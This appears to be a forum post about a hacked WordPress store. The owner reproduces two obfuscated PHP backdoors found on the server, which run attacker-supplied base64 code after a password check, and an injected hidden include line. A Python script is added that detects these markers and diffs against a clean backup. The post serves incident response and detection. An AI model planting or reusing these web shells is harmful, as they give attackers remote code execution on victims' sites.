Someone got in my sister’s WP store

Hey guys, how are you doing?

**Update: I've got the site back online by removing most of the files and malicious code I could find by date with FTP access. I'm installing Wordfence now, and will run it and then Sucuri. It's still infected, as it is creating new files as I'm typing this.**

I've tried rebooting, upgrading and updating the server, and tried to point the domain at Cloudflare (it didn't arrive, odd). Then I tried debug mode, renaming everything in wp-content and the .htaccess file, and increasing `WP_MEMORY_LIMIT` to 256M, and nothing changed.

Today I went through the files again, reset the server root user, and found this code in index.php, config.php, and other PHP files:

@ include (“/var/www/html/wp-includes/images/crystal/ .de5163f6.inc”);

(spaces added for the Reddit post)

I also found 2 files called "wp-log-SVZpej.php.suspected" and "wp-working-need-hdr.php.suspected". I sent their contents to GPT AI and it confirmed to me that they are malicious scripts.

Here is the "wp-working-need-hdr.php.suspected":

`<?php error_reporting(0); $ajzvw = array_merge($_GET, $_COOKIE, $_POST); $fzipc = ‘in_’.’ar’.’ray’; if($ajzvw[‘m’]==’1′) die(‘c920bd25bfe7c05c3a51ef5a9879fcbd’); if(md5($ajzvw[‘a2e5e’])===’c920bd25bfe7c05c3a51ef5a9879fcbd’) ggsnv($ajzvw); function ggsnv($lxlto){ $uhfii =’fi’.’le_’.’exi’.’sts’; $ykplv =’f’ .’op’ .’en’; $qbekt = ‘f’.’cl’.’ose’; $ceduf = ‘u’.’nl’.’ink’; if($uhfii(‘./wp-sale.js’)){@$ceduf(‘./wp-sale.js’);} $lioel = ‘t’.’mpf’.’ile’; $cejqo = ‘fw’.’rite’; $zeceh = ‘fs’.’eek’; $yfhky = ‘ba’.’se’.chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).’o’. chr(100) . chr(101); $fzipc = ‘str’.’ea’.’m_’.’get’.’_m’.’eta’.’_’.’data’; $yjdxs = $lioel(); if(fwrite($yjdxs, chr(60).chr(63).chr(112).chr(104).chr(112).chr(32). $yfhky($lxlto[‘ab75a’]))!=false){ include($fzipc($yjdxs)[‘uri’]); $qbekt($yjdxs); } else { @eval($yfhky($lxlto[‘ab75a’])); } } ?>`

Here is the one on “wp-log-SVZpej.php.suspected”:

`<?php $t=”er”.”ro”.”r_”.”r”.”epo”.”rt”.”in”.”g”;$t(0); $a=sys_get_temp_dir();if(isset($_POST[‘bh’])){if(md5($_POST[‘bh’])===”8f1f964a4b4d8d1ac3f0386693d28d03″){$b3=$_POST[‘b3’];file_put_contents($a.”/tpfile”,”<“.”?”.”p”.”h”.”p “.base64_decode($b3));@include($a.”/tpfile”);die();}}if(isset($_POST[‘tick’])||isset($_GET[‘tick’])){echo md5(‘885’);}`

Funnily enough, I have a copy of the same WP files dated 2021 in another folder on this server, so it was quite fast to see which files were new or updated between the live and "backup" files.

Has anyone gone through the same thing? I fear I don't have a backup for this, although I am still looking through my cloud accounts.
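A defender-side check for what this post describes, added here as an example and not code from the post: it flags PHP files carrying the injected `@ include` of a hidden hex-named `.inc`, the traits the two dropped shells share (merged request input, split-up function names, decode-then-run), and compares the live tree against a known-clean copy like the 2021 backup by file hash. The sample strings and paths below are constructed for the demo, and the indicator regexes are my own assumptions about what is worth flagging.

```python
import hashlib
import re
from pathlib import Path

# Markers from this incident: the "@ include" of a hidden hex-named .inc, and the traits the
# two dropped shells share (merged request input, split-up function names, decode-then-run).
INDICATORS = {
    "hidden_inc_include": re.compile(r'@\s*include\s*\(\s*["\'][^"\']*/\s*\.[0-9a-f]+\.inc["\']'),
    "merged_request_input": re.compile(r'array_merge\s*\(\s*\$_(?:GET|COOKIE|POST)'),
    "split_function_name": re.compile(r'(?:["\'][a-z_]{1,5}["\']\s*\.\s*){2,}["\'][a-z_]{1,5}["\']'),
    "decode_and_run": re.compile(r'base64_decode|\beval\s*\(|tmpfile\s*\('),
}

def scan_text(text):
    """Return the indicator names present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def scan_tree(root):
    """Map relative path -> indicators for PHP-like files under root; .suspected files always listed."""
    hits = {}
    for p in root.rglob("*"):
        if p.is_file() and (p.suffix in (".php", ".inc", ".suspected") or p.name.startswith(".")):
            found = ["suspected_extension"] if p.suffix == ".suspected" else []
            found += scan_text(p.read_text(errors="ignore"))
            if found:
                hits[str(p.relative_to(root))] = found
    return hits

def hash_tree(root):
    """Relative path -> SHA-256 for every file under root (run on the live tree and on the clean copy)."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in root.rglob("*") if p.is_file()}

def diff_trees(live, clean):
    """Files added to or changed in the live tree relative to the known-clean copy."""
    return {"added": sorted(p for p in live if p not in clean),
            "modified": sorted(p for p in live if p in clean and live[p] != clean[p])}

# Constructed samples (not the post's verbatim shells) so the functions can be exercised offline.
SAMPLE_INJECTED_INDEX = '<?php\n@ include ("/var/www/html/wp-includes/images/crystal/ .de5163f6.inc");\n'
SAMPLE_DROPPER = "<?php $t='er'.'ro'.'r_'.'rep'.'ort'.'ing'; $t(0); $v=array_merge($_GET, $_COOKIE, $_POST);"
SAMPLE_CLEAN = "<?php\n/** Front to the WordPress application. */\nrequire __DIR__ . '/wp-blog-header.php';\n"
if __name__ == "__main__":
    import sys  # usage: python scan.py /var/www/html [/path/to/clean-copy]
    live = Path(sys.argv[1])
    for path, found in scan_tree(live).items():
        print(f"{path}: {', '.join(found)}")
    if len(sys.argv) > 2:
        print(diff_trees(hash_tree(live), hash_tree(Path(sys.argv[2]))))
```

Anything listed under "modified" in core files such as index.php is a candidate for the injected include line; review those before restoring them from the clean copy.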

1 Comment
  1. Have you tried installing wordfence or sucuri to scan and clean the website?
